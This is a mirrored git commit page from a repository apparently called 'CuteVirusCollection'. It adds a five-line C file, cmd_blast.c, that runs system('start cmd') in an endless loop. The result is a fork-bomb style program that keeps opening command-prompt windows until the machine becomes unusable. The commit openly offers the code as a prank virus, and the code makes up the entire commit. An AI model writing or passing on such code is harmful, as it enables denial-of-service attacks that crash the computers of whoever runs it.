mirror of
https://github.com/MinhasKamal/CuteVirusCollection.git
synced 2025-12-22 23:26:26 -08:00
command prompt blast
This commit is contained in:
5
cmd_blast.c
Normal file
5
cmd_blast.c
Normal file
@@ -0,0 +1,5 @@
|
||||
main(){
|
||||
while(1){
|
||||
system("start cmd");
|
||||
}
|
||||
}
|
||||
Reference in New Issue
Block a user